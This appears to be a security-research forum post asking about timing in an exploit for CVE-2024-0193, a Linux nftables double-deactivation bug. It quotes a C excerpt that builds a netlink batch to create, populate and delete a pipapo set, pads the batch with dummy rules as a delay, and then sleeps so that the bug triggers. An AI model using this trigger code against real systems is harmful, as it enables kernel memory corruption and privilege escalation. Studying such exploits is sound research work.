security-research
Some Questions about nftables in CVE-2024-0193
The vulnerability is deactivating the catchall elem many times. But it constructs new_pipapo_set, new_set_elem_with_expiration, del_set to trigger the vulnerability. It will deactivate the elem first in the nft_delset func, and when the elem is expired, the elem will be deactivated again in the nft_pipapo_commit func. Why is the usleep function below sending the batch msg?
```c
/* Build one nftables netlink batch: create a set, add an element to it,
 * delete the set, then pad the batch with dummy rules before sending it. */
batch = mnl_nlmsg_batch_start(buf, buf_size);
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

/* NFT_MSG_NEWSET: create set1 */
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
nftnl_set_nlmsg_build_payload(nlh, set1);
mnl_nlmsg_batch_next(batch);

/* NFT_MSG_NEWSETELEM: add set1_elem to set1 */
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSETELEM, family, NLM_F_CREATE, seq++);
nftnl_set_elems_nlmsg_build_payload(nlh, set1_elem);
mnl_nlmsg_batch_next(batch);

/* NFT_MSG_DELSET: delete set1 within the same batch */
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELSET, family, 0, seq++);
nftnl_set_nlmsg_build_payload(nlh, set1);
mnl_nlmsg_batch_next(batch);

// delay
for (int i = 0; i < 0x800; i++) {
    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, rule_dummy);
    mnl_nlmsg_batch_next(batch);
}

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

/* send the whole batch to the kernel in one netlink write */
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
    err(1, "mnl_socket_send");
}

// wait for destroy work (triggering the vulnerability)
usleep(300 * 1000); // why here, below the msg?
```
And how many operations can the OS complete within 1 jiffy?